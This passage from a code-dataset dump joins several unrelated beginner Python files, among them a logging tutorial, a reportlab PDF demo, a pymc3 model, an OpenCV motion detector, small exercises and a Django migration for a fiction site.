==============================================================================\n\n# ==============================================================================\n# Logger: Class whose objects will be used in the application code directly to\n# call the functions\n#\n# LogRecord: Auto-created by Loggers; they hold all the info related to the event\n# being logged.\n#\n# Handler: Sends the LogRecord to the required output destination like the\n# console or a file. It's the base for subclasses like StreamHandler,\n# FileHandler, SMTPHandler, HTTPHandler\n#\n# Formatter: Where you specify the format of the output by specifying a string\n# format that lists out the attributes that the output should contain.\n# ==============================================================================\n\n# ==============================================================================\n# Instantiate the Logger class using logging.getLogger(name)\n# Multiple calls to getLogger() with the same name will return a reference to\n# the same Logger object.\n#\n# It is recommended that we use module-level loggers by passing __name__ as\n# the name parameter to getLogger()\n# ==============================================================================\n\n\ndef log_test1():\n logger = logging.getLogger('example_logger')\n logger.warning('This is a warning')\n logger2 = logging.getLogger(__name__)\n logger2.warning('This is another warning')\n\n# ==============================================================================\n# Unlike the root logger, custom loggers can't be configured using\n# basicConfig()\n#\n# Like loggers, you can set the severity level in handlers... useful if you\n# want to set multiple handlers for the same logger but want different severity\n# levels for each of them. E.g. 
warnings logged to the console but everything\n# to a file.\n# ==============================================================================\n\n\ndef log_test2():\n logger = logging.getLogger(__name__)\n\n c_handler = logging.StreamHandler()\n f_handler = logging.FileHandler('app.log', mode='w')\n\n c_handler.setLevel(logging.WARNING)\n f_handler.setLevel(logging.ERROR)\n\n c_format = logging.Formatter('%(name)s :: %(levelname)s :: %(message)s')\n f_format = logging.Formatter('%(asctime)s :: %(name)s :: %(levelname)s :: %(message)s')\n\n c_handler.setFormatter(c_format)\n f_handler.setFormatter(f_format)\n\n logger.addHandler(c_handler)\n logger.addHandler(f_handler)\n\n logger.warning('This is a warning')\n logger.error('This is an error')\n\n\n# ==============================================================================\n# todo: continue with tutorial here...\n# https://realpython.com/python-logging/\n# Other Configuration methods\n# ==============================================================================\ndef log_test3():\n logger = logging.getLogger(__name__)\n\n f_handler = logging.FileHandler('app.log', mode='w')\n\n f_handler.setLevel(logging.DEBUG)\n\n logger.addHandler(f_handler)\n\n logger.debug('debug mesg')\n logger.info('info mesg')\n logger.warning('warning mesg')\n logger.error('error mesg')\n\ndef log_test4():\n ...\n\ndef log_test5():\n ...\n\ndef log_test6():\n ...\n\ndef log_test7():\n ...\n\nswitch = {\n 'test1': log_test1,\n 'test2': log_test2,\n 'test3': log_test3,\n 'test4': log_test4,\n 'test5': log_test5,\n 'test6': log_test6,\n 'test7': log_test7\n}\n\nrunme = 'test3'\n\nswitch[runme]()\n\n\n\n","repo_name":"spelee/python_edu","sub_path":"tutorials/learnlog/mytest3a.py","file_name":"mytest3a.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70545363128","text":"import requests\n\nclass TestFirstAPI:\n def test_hello_header(self):\n url = \"https://playground.learnqa.ru/api/homework_header\"\n expected_val = 'Some secret value'\n\n response = requests.post(url)\n actual_val = response.headers['x-secret-homework-header']\n\n print(response.headers)\n assert actual_val == expected_val, f\"The response has no x-secret-homework-header header\"","repo_name":"ale4103/LearnQA_PythonAPI","sub_path":"main/ex12_header.py","file_name":"ex12_header.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1096849542","text":"from reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\n\nfrom reportlab.lib import colors\nfrom reportlab.lib.enums import TA_CENTER, TA_LEFT\nfrom reportlab.lib.pagesizes import letter, landscape\nfrom reportlab.lib.colors import HexColor\nfrom reportlab.lib.units import inch, mm, cm\n\nfrom reportlab.platypus import Paragraph, SimpleDocTemplate, PageBreak,Image, Table, TableStyle,Spacer\nfrom reportlab.lib.styles import ParagraphStyle, getSampleStyleSheet\n\nfrom reportlab.graphics.charts.piecharts import Pie\nfrom reportlab.graphics.shapes import Drawing, Rect\nfrom reportlab.graphics.charts.textlabels import Label\n\n\n\n\n\n# Reference docs\n# Python Reportlab module: https://www.cnblogs.com/hujq1029/p/7767980.html\n\n# Register the font\n# simsun.ttc download: https://github.com/StellarCN/scp_zh/tree/master/fonts\n# after downloading simsun.ttc, put it in the ${python_home}\\\\Lib\\\\site-packages\\\\reportlab\\\\fonts directory\npdfmetrics.registerFont(TTFont('SimSun', 
\"simsun.ttc\"))\n\ndef text_test():\n\tStyle = getSampleStyleSheet()\n\n\tbt = Style['Normal'] # 字体的样式\n\t# bt.fontName='song' #使用的字体\n\tbt.fontSize = 14 # 字号\n\tbt.wordWrap = 'CJK' # 该属性支持自动换行,'CJK'是中文模式换行,用于英文中会截断单词造成阅读困难,可改为'Normal'\n\tbt.firstLineIndent = 32 # 该属性支持第一行开头空格\n\tbt.leading = 20 # 该属性是设置行距\n\n\tct = Style['Normal']\n\tct.fontName='SimSun'\n\tct.fontSize = 12\n\tct.alignment = 1 # 居中\n\n\tct.textColor = colors.red\n\n\tt = Paragraph('你瞅啥?', bt)\n\treturn t\n\ndef autoLegender( title=''):\n\t'''\n\t\t在边框中添加文字\n\t:param title:\n\t:return:\n\t'''\n\n\twidth = 448\n\theight = 230\n\td = Drawing(width,height)\n\tlab = Label()\n\tlab.x = 220 #x和y是文字的位置坐标\n\tlab.y = 210\n\tlab.setText(title)\n\tlab.fontName = 'SimSun' #增加对中文字体的支持\n\tlab.fontSize = 20\n\td.add(lab)\n\td.background = Rect(0,0,width,height,strokeWidth=1,strokeColor=\"#868686\",fillColor=None) #边框颜色\n\n\treturn d\n\n\ndef table_model(data):\n\twidth = 7.2 # 总宽度\n\tcolWidths = (width / len(data[0])) * inch # 每列的宽度\n\n\tdis_list = []\n\tfor x in data:\n\t\t# dis_list.append(map(lambda i: Paragraph('%s' % i, cn), x))\n\t\tdis_list.append(x)\n\n\tstyle = [\n\t\t# ('FONTNAME', (0, 0), (-1, -1), 'song'), # 字体\n\t\t('FONTSIZE', (0, 0), (-1, 0), 15), # 字体大小\n\t\t('BACKGROUND', (0, 0), (-1, 0), HexColor('#d5dae6')), # 设置第一行背景颜色\n\t\t('BACKGROUND', (0, 1), (-1, 1), HexColor('#d5dae6')), # 设置第二行背景颜色\n\n\t\t# 合并 ('SPAN',(第一个方格的左上角坐标),(第二个方格的左上角坐标)),合并后的值为靠上一行的值,按照长方形合并\n\t\t('SPAN', (0, 0), (0, 1)),\n\t\t('SPAN', (1, 0), (2, 0)),\n\t\t('SPAN', (3, 0), (4, 0)),\n\t\t('SPAN', (5, 0), (7, 0)),\n\n\t\t('ALIGN', (0, 0), (-1, -1), 'CENTER'), # 对齐\n\t\t('VALIGN', (-1, 0), (-2, 0), 'MIDDLE'), # 对齐\n\t\t('LINEBEFORE', (0, 0), (0, -1), 0.1, colors.grey), # 设置表格左边线颜色为灰色,线宽为0.1\n\t\t('TEXTCOLOR', (0, 0), (-1, 0), colors.royalblue), # 设置表格内文字颜色\n\t\t('TEXTCOLOR', (0, -1), (-1, -1), colors.red), # 设置表格内文字颜色\n\t\t('GRID', (0, 0), (-1, -1), 0.5, colors.grey), # 设置表格框线为grey色,线宽为0.5\n\t]\n\n\tcomponent_table = Table(dis_list, colWidths=colWidths, style=style)\n\n\treturn component_table\n\n\ndef draw_pie_autoLegender( chart,title=''):\n\twidth = 448\n\theight = 230\n\td = Drawing(width,height)\n\tlab = Label()\n\tlab.x = 220 #x和y是文字的位置坐标\n\tlab.y = 210\n\tlab.setText(title)\n\tlab.fontName = 'SimSun' #增加对中文字体的支持\n\tlab.fontSize = 20\n\td.add(lab)\n\td.background = Rect(0,0,width,height,strokeWidth=1,strokeColor=\"#868686\",fillColor=None) #边框颜色\n\td.add(chart)\n\n\treturn d\n\ndef draw_pie(data=[], labels=[], use_colors=[], width=360,):\n '''更多属性请查询reportlab.graphics.charts.piecharts.WedgeProperties'''\n\n pie = Pie()\n pie.x = 60 # x,y饼图在框中的坐标\n pie.y = 20\n pie.slices.label_boxStrokeColor = colors.white #标签边框的颜色\n\n pie.data = data # 饼图上的数据\n pie.labels = labels # 数据的标签\n pie.simpleLabels = 0 # 0 标签在标注线的右侧;1 在线上边\n pie.sameRadii = 1 # 0 饼图是椭圆;1 饼图是圆形\n\n pie.slices.strokeColor = colors.red # 圆饼的边界颜色\n pie.strokeWidth=1 # 圆饼周围空白区域的宽度\n pie.strokeColor= colors.white # 整体饼图边界的颜色\n pie.slices.label_pointer_piePad = 10 # 圆饼和标签的距离\n pie.slices.label_pointer_edgePad = 25 # 标签和外边框的距离\n pie.width = width\n pie.direction = 'clockwise'\n pie.pointerLabelMode = 'LeftRight'\n # for i in range(len(labels)):\n # pie.slices[i].fontName = 'song' #设置中文\n for i, col in enumerate(use_colors):\n pie.slices[i].fillColor = col\n return pie\n\n\nif __name__ == \"__main__\":\n\telements = []\n\n\t# 设置上下左右的外边距\n\tleftMargin = 0.1*inch\n\trightMargin = 0.1*inch\n\ttopMargin=0.1*inch\n\tbottomMargin=0.1* inch\n\n\tpdf = SimpleDocTemplate('reportlab_test5.pdf', 
\n\n\ttitle_style = ParagraphStyle(name=\"TitleStyle\", fontName=\"SimSun\", fontSize=48, alignment=TA_LEFT )\n\tsub_title_style = ParagraphStyle(name=\"SubTitleStyle\", fontName=\"SimSun\", fontSize=32,textColor=colors.HexColor(0x666666), alignment=TA_LEFT)\n\tcontent_style = ParagraphStyle(name=\"ContentStyle\", fontName=\"SimSun\", fontSize=18, leading=25, spaceAfter=20,underlineWidth=1, alignment=TA_LEFT )\n\tfoot_style = ParagraphStyle(name=\"FootStyle\", fontName=\"SimSun\", fontSize=14,textColor=colors.HexColor(0xB4B4B4),leading=25, spaceAfter=20, alignment=TA_CENTER)\n\n\tpage1 = text_test()\n\telements.append(page1)\n\telements.append(Spacer(1, 10 * mm))\n\telements.append(Paragraph(\"测试报告\", title_style))\n\telements.append(Spacer(1, 10 * mm))\n\telements.append(Paragraph(\"Test Report of XXX\", sub_title_style))\n\telements.append(Spacer(1, 15 * mm))\n\telements.append(Paragraph(\"报告编号:\" + \"007\", content_style))\n\telements.append(Paragraph(\"计划名称:\" + \"xxx软件测试报告\", content_style))\n\telements.append(Paragraph(\"报告日期:\" + \"2019-10-23\", content_style))\n\telements.append(Paragraph(\" 负责人:\" + \"测试组\", content_style))\n\telements.append(Spacer(1, 15 * mm))\n\telements.append(Paragraph(\"内部文档,请勿外传\", foot_style))\n\telements.append(PageBreak())\n\n\t# page2 = autoLegender(\"你好!\")\n\t# elements.append(page2)\n\t# elements.append(PageBreak())\n\n\t# elements.append(Spacer(1, 5.5* inch))\n\telements.append(Spacer(1, 1 * mm))\n\tStyle = getSampleStyleSheet()\n\tn = Style['Normal']\n\tdata = [[0, 1, 2, 3, 4, 5, 6, 7],\n\t\t\t[00, 11, 22, 33, 44, 55, 66, 77],\n\t\t\t[000, 111, 222, 333, 444, 555, 666, 777],\n\t\t\t[0000, 1111, 2222, 3333, 4444, 5555, 6666, 7777], ]\n\tpage3_table = table_model(data)\n\telements.append(Paragraph('Title', n))\n\telements.append(page3_table)\n\n\n\tdata = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]\n\tlabs = ['0000000', '1111111', '2222222', '3333333', '4444444',\n\t\t\t'5555555', '6666666', '7777777', '8888888', '9999999']\n\tcolor = [HexColor(\"#696969\"), HexColor(\"#A9A9A9\"), HexColor(\"#D8BFD8\"),\n\t\t\t HexColor(\"#DCDCDC\"), HexColor('#E6E6FA'), HexColor(\"#B0C4DE\"),\n\t\t\t HexColor(\"#778899\"), HexColor('#B0C4DE'), HexColor(\"#6495ED\"),\n\t\t\t HexColor(\"#483D8B\")\n\t\t\t ]\n\tpage4 = draw_pie_autoLegender(draw_pie(data, labs, color), \"饼状图\")\n\telements.append(Spacer(1, 2 * inch))\n\telements.append(Spacer(1, 2 * inch))\n\telements.append(Spacer(1, 2 * inch))\n\n\telements.append(page4)\n\telements.append(PageBreak())\n\n\t# img = Image('./地云土地报告PPT模板/PPT封面.png')\n\t# img.drawHeight = 16 * cm\n\t# img.drawWidth = 33 * cm\n\t# # img.hAlign = TA_LEFT\n\t# elements.append(img)\n\t# text_test = text_test()\n\t# elements.append(text_test)\n\n\n\t# elements.append(PageBreak())\n\t#\n\t# img = Image('./地云土地报告PPT模板/toubu.png')\n\t# img.drawHeight = 16 * cm\n\t# img.drawWidth = 33 * cm\n\t# elements.append(img)\n\t# elements.append(PageBreak())\n\n\t# todo: a PDF built via SimpleDocTemplate.build() currently cannot take a background image (tiled or stretched), nor draw text on top of one\n\n\tpdf.build(elements)\n\n","repo_name":"lizhou828/python_hello_world","sub_path":"helloWorld/pdf_template/reportlab_test5.py","file_name":"reportlab_test5.py","file_ext":"py","file_size_in_byte":8369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"70680097208","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport pymc3 as pm\nimport arviz as az
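\n\n# the priors below: Poisson(mu=20) customers, Normal(mu=1, sigma=0.5) ordering\n# time, Exponential(lam=1/10) cooking time -- an Exponential with lam=1/10 has\n# mean 1/lam = 10 minutes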
\n\nmodel = pm.Model()\nif __name__ == '__main__':\n    with model:\n        clienti = pm.Poisson('C', mu=20)\n        comanda = pm.Normal('Cmd',mu=1,sigma=0.5)\n        gatit = pm.Exponential('G',lam=1/10) #alpha=10\n        timp = pm.Normal('T',gatit+comanda)\n        trace = pm.sample(2000)\n\n    dictionary = {\n        'clienti': trace['C'].tolist(),\n        'comanda': trace['Cmd'].tolist(),\n        'gatit': trace['G'].tolist(),\n        'timp': trace['T'].tolist()\n    }\n    df=pd.DataFrame(dictionary)\n\n    # alpha=10 is the largest value for which the probability that the serving time stays under 15 minutes is still 95%\n    p_timp= df[(df['timp'] <=15)].shape[0] / df.shape[0]\n\n    sumtimp=0\n    for idx in range(df.shape[0]):\n        sumtimp+=df.at[idx,'timp']\n\n    medie= sumtimp /df.shape[0]\n    print(p_timp)\n    print(medie)\n\n","repo_name":"LupuFlorin/PMP_LupuFlorinB1","sub_path":"Lab4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9315813603","text":"import cv2\r\nfrom datetime import datetime\r\n\r\n\r\n\"\"\" detect the motion \"\"\"\r\ndef motion_detector(frame, cnts, cap_flag, motion_flag, status_list, motion_time, out):\r\n    '''\r\n    Detect motion from the contour areas,\r\n    annotate the room status on the frame,\r\n    and stamp the date and time on the live video.\r\n    '''\r\n    text = 'No Motion' \r\n    for cnt in cnts:\r\n        if cv2.contourArea(cnt) < 700:\r\n            continue\r\n\r\n        text = 'Motion'\r\n\r\n        motion_flag = 1\r\n        #(x, y, w, h) = cv2.boundingRect(cnt)\r\n        #cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 255), 2)\r\n\r\n    status_list.append(motion_flag)\r\n\r\n    # keep only the last two states to save memory\r\n    status_list = status_list[-2:]\r\n\r\n    if status_list[-1] == 1 and status_list[-2] == 0:\r\n        motion_time.append(datetime.now())\r\n\r\n    if status_list[-1] == 0 and status_list[-2] == 1:\r\n        motion_time.append(datetime.now())\r\n\r\n    font = cv2.FONT_HERSHEY_SIMPLEX\r\n\r\n    cv2.putText(frame, f'[+] Room Status: {text}', (10, 20), font, 0.5, (0, 0 ,255), 1, cv2.LINE_AA)\r\n\r\n    if cap_flag == 1:\r\n        cv2.putText(frame, datetime.now().strftime(r'%A %d %B %Y %I:%M:%S %p'), \r\n                    (10, frame.shape[0]-10), font, 0.5, (0, 0 ,255), 1, cv2.LINE_AA)\r\n\r\n    # write the frame out only when motion was seen\r\n    if motion_flag == 1:\r\n        out.write(frame)\r\n    \r\n    return (motion_flag, status_list)","repo_name":"tarek0m/Big-Brother-Is-Watching-You","sub_path":"motion_detection.py","file_name":"motion_detection.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29492473449","text":"def decodificar(mensaje):\n    opcion = input(\"Elige 1 (letra a ASCII) o 2 (numero a letra) > \")\n    letra = \"\"\n    numero = \"\"\n    if (opcion == \"1\"):\n        letra=input(\"\\nIntroduce la Letra > \")\n        letra2 = ord(letra) # ord() gives the ASCII value of the character\n        print(\"El valor Ascii es:\", letra2)\n        print(\"\\n\\n\")\n    elif (opcion == \"2\"):\n        numero=input(\"\\nIntroduce el numero > \")\n        numero2 = chr(int(numero)) # chr() gives the character for that code\n        print(\"\\nEl valor de la letra es:\", numero2)\n        print(\"\\n\\n\")\n    else:\n        print(\"No valido\")\n        print(\"\\n\\n\")\n\nif __name__ == \"__main__\":\n    mensaje=decodificar(\"01101000,01101111,01101100,01100001\")\n    print(mensaje)\n    
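\n\n# a minimal sketch of the decoder the exercise seems to want (kept commented\n# out; assumes the message is comma-separated 8-bit binary chunks):\n# ''.join(chr(int(b, 2)) for b in mensaje.split(','))  # -> 'hola'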
","repo_name":"pabloschwarzenberg/grader","sub_path":"tema9_ej3/tema9_ej3_jadelzo.py","file_name":"tema9_ej3_jadelzo.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32437810891","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\ndef sort(arr ,k):\n return sorted(\n arr,\n key = lambda a: a[k]\n )\n\n\n\nif __name__ == '__main__':\n nm = input().split()\n\n n = int(nm[0])\n\n m = int(nm[1])\n\n arr = []\n\n for _ in range(n):\n arr.append(list(map(int, input().rstrip().split())))\n\n k = int(input())\n\n sorted_arr = sort(arr, k)\n\n for el in sorted_arr:\n print(' '.join(map(str,el)))\n","repo_name":"Ephrathah0/A2SV-competitve-programming","sub_path":"python practice/any or all.py","file_name":"any or all.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"16352850907","text":"# Determine whether an integer is a palindrome. Do this without extra space.\n#\n#hint: Could negative integers be palindromes? (ie, -1)\n#\n# If you are thinking of converting the integer to string, note the restriction of using extra space.\n#\n# You could also try reversing an integer. However, if you have solved the problem \"Reverse Integer\", you know that the reversed integer might overflow. How would you handle such case?\n#\n# There is a more generic way of solving this problem.\nclass Solution(object):\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if (x<0 or (x!=0 and x%10==0)): # x not neg, if x= 10,100,1000,....\n return False\n rev = 0\n while (x>rev):\n rev = rev *10 + x%10 # creating the reverse number using the digits\n x = x/10\n return x==rev or x==rev/10 # if x == rev, when x = 1 to 9 have to divide with 10\n","repo_name":"harishpuvvada/Algorithms-using-Python","sub_path":"Misc/Leetcode - Palindrome number .py","file_name":"Leetcode - Palindrome number .py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"27940402625","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\nimport ponyFiction.fields\nimport django.contrib.auth.models\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Author',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('password', models.CharField(verbose_name='password', max_length=128)),\n ('last_login', models.DateTimeField(null=True, verbose_name='last login', blank=True)),\n ('is_superuser', models.BooleanField(help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status', default=False)),\n ('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, unique=True, help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', verbose_name='username', max_length=30, validators=[django.core.validators.RegexValidator('^[\\\\w.@+-]+$', 'Enter a valid username. 
This value may contain only letters, numbers and @/./+/-/_ characters.', 'invalid')])),\n ('first_name', models.CharField(max_length=30, verbose_name='first name', blank=True)),\n ('last_name', models.CharField(max_length=30, verbose_name='last name', blank=True)),\n ('email', models.EmailField(max_length=254, verbose_name='email address', blank=True)),\n ('is_staff', models.BooleanField(help_text='Designates whether the user can log into this admin site.', verbose_name='staff status', default=False)),\n ('is_active', models.BooleanField(help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active', default=True)),\n ('date_joined', models.DateTimeField(verbose_name='date joined', default=django.utils.timezone.now)),\n ('bio', models.TextField(max_length=2048, verbose_name='О себе', blank=True)),\n ('jabber', models.EmailField(max_length=75, verbose_name='Jabber', blank=True)),\n ('skype', models.CharField(max_length=256, verbose_name='Skype ID', blank=True)),\n ('tabun', models.CharField(max_length=256, verbose_name='Табун', blank=True)),\n ('forum', models.URLField(verbose_name='Форум', blank=True)),\n ('vk', models.URLField(verbose_name='VK', blank=True)),\n ('excluded_categories', ponyFiction.fields.SeparatedValuesField(null=True, verbose_name='Скрытые категории', max_length=200)),\n ('detail_view', models.BooleanField(verbose_name='Детальное отображение рассказов', default=False)),\n ('nsfw', models.BooleanField(verbose_name='NSFW без предупреждения', default=False)),\n ('groups', models.ManyToManyField(blank=True, related_query_name='user', help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', verbose_name='groups', to='auth.Group', related_name='user_set')),\n ('user_permissions', models.ManyToManyField(blank=True, related_query_name='user', help_text='Specific permissions for this user.', verbose_name='user permissions', to='auth.Permission', related_name='user_set')),\n ],\n options={\n 'verbose_name': 'автор',\n 'verbose_name_plural': 'авторы',\n },\n managers=[\n ('objects', django.contrib.auth.models.UserManager()),\n ],\n ),\n migrations.CreateModel(\n name='Activity',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата последнего просмотра автором', auto_now_add=True)),\n ('last_views', models.IntegerField(verbose_name='Последнее количество просмотров', default=0)),\n ('last_comments', models.IntegerField(verbose_name='Последнее количество комментариев', default=0)),\n ('last_vote_up', models.IntegerField(verbose_name=\"Последнее количество голосов 'За'\", default=0)),\n ('last_vote_down', models.IntegerField(verbose_name=\"Последнее количество голосов 'Против'\", default=0)),\n ('author', models.ForeignKey(null=True, verbose_name='Автор просмотра', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'активность',\n 'verbose_name_plural': 'активность',\n },\n ),\n migrations.CreateModel(\n name='BetaReading',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('checked', models.BooleanField(verbose_name='Вычитано бетой', default=False)),\n ('beta', models.ForeignKey(null=True, verbose_name='Бета', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'вычитка',\n 'verbose_name_plural': 'вычитки',\n },\n ),\n migrations.CreateModel(\n 
name='Bookmark',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата добавления в список для прочтения', auto_now_add=True)),\n ('author', models.ForeignKey(null=True, verbose_name='Автор', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'закладка рассказа',\n 'verbose_name_plural': 'закладки рассказов',\n },\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('description', models.TextField(max_length=4096, verbose_name='Описание', blank=True)),\n ('name', models.CharField(verbose_name='Название', max_length=256)),\n ],\n options={\n 'verbose_name': 'жанр',\n 'verbose_name_plural': 'жанры',\n },\n ),\n migrations.CreateModel(\n name='Chapter',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата публикации', auto_now_add=True)),\n ('mark', models.PositiveSmallIntegerField(verbose_name='Оценка', default=0)),\n ('notes', models.TextField(verbose_name='Заметки к главе', blank=True)),\n ('order', models.PositiveSmallIntegerField(verbose_name='Порядок глав в рассказу', default=1)),\n ('title', models.CharField(verbose_name='Название', max_length=512)),\n ('text', models.TextField(verbose_name='Текст главы', blank=True)),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Дата обновления')),\n ('words', models.IntegerField(verbose_name='Количество слов в главе', default=0)),\n ],\n options={\n 'verbose_name': 'глава',\n 'verbose_name_plural': 'главы',\n },\n ),\n migrations.CreateModel(\n name='Character',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('description', models.TextField(max_length=4096, verbose_name='Биография', blank=True)),\n ('name', models.CharField(verbose_name='Имя', max_length=256)),\n ],\n options={\n 'verbose_name': 'персонаж',\n 'verbose_name_plural': 'персонажи',\n },\n ),\n migrations.CreateModel(\n name='CharacterGroup',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('name', models.CharField(verbose_name='Название группы', max_length=256)),\n ('description', models.TextField(max_length=4096, verbose_name='Описание группы', blank=True)),\n ],\n options={\n 'verbose_name': 'Группа персонажей',\n 'verbose_name_plural': 'Группы персонажей',\n },\n ),\n migrations.CreateModel(\n name='Classifier',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('description', models.TextField(max_length=4096, verbose_name='Описание', blank=True)),\n ('name', models.CharField(verbose_name='Название', max_length=256)),\n ],\n options={\n 'verbose_name': 'событие',\n 'verbose_name_plural': 'события',\n },\n ),\n migrations.CreateModel(\n name='CoAuthorsSeries',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('approved', models.BooleanField(verbose_name='Подтверждение', default=False)),\n ('author', models.ForeignKey(null=True, verbose_name='Автор', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='CoAuthorsStory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('approved', 
models.BooleanField(verbose_name='Подтверждение', default=False)),\n ('author', models.ForeignKey(verbose_name='Автор', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата публикации', auto_now_add=True)),\n ('text', models.TextField(verbose_name='Текст комментария')),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Дата обновления')),\n ('ip', models.GenericIPAddressField(verbose_name='IP комментатора', default='0.0.0.0')),\n ('author', models.ForeignKey(null=True, verbose_name='Автор комментария', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'комментарий',\n 'verbose_name_plural': 'комментарии',\n },\n ),\n migrations.CreateModel(\n name='Favorites',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата добавления в избранное', auto_now_add=True)),\n ('author', models.ForeignKey(null=True, verbose_name='Автор', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'избранное',\n 'verbose_name_plural': 'избранное',\n },\n ),\n migrations.CreateModel(\n name='InSeriesPermissions',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('order', models.PositiveSmallIntegerField(verbose_name='Порядок рассказов в серии', default=1)),\n ('request', models.BooleanField(verbose_name='Запрос на добавление', default=False)),\n ('answer', models.BooleanField(verbose_name='Ответ на запрос', default=False)),\n ],\n options={\n 'verbose_name': 'добавление в серию',\n 'verbose_name_plural': 'добавления в серию',\n },\n ),\n migrations.CreateModel(\n name='Rating',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('description', models.TextField(max_length=4096, verbose_name='Описание', blank=True)),\n ('name', models.CharField(verbose_name='Название', max_length=256)),\n ],\n options={\n 'verbose_name': 'рейтинг',\n 'verbose_name_plural': 'рейтинги',\n },\n ),\n migrations.CreateModel(\n name='Series',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('cover', models.BooleanField(verbose_name='Наличие обложки', default=False)),\n ('date', models.DateTimeField(verbose_name='Дата публикации', auto_now_add=True)),\n ('draft', models.BooleanField(verbose_name='Черновик', default=True)),\n ('finished', models.BooleanField(verbose_name='Оконченность cерии', default=False)),\n ('freezed', models.BooleanField(verbose_name='Статус \"заморозки\"', default=False)),\n ('mark', models.PositiveSmallIntegerField(verbose_name='Оценка', default=0)),\n ('notes', models.TextField(max_length=8192, verbose_name='Заметки к серии', blank=True)),\n ('original', models.BooleanField(verbose_name='Статус оригинала', default=True)),\n ('summary', models.TextField(verbose_name='Общее описание', max_length=8192)),\n ('title', models.CharField(verbose_name='Название', max_length=512)),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Дата обновления')),\n ('views', models.IntegerField(verbose_name='Количество просмотров', default=0)),\n ('authors', models.ManyToManyField(verbose_name='Авторы', to=settings.AUTH_USER_MODEL, through='ponyFiction.CoAuthorsSeries')),\n ],\n options={\n 
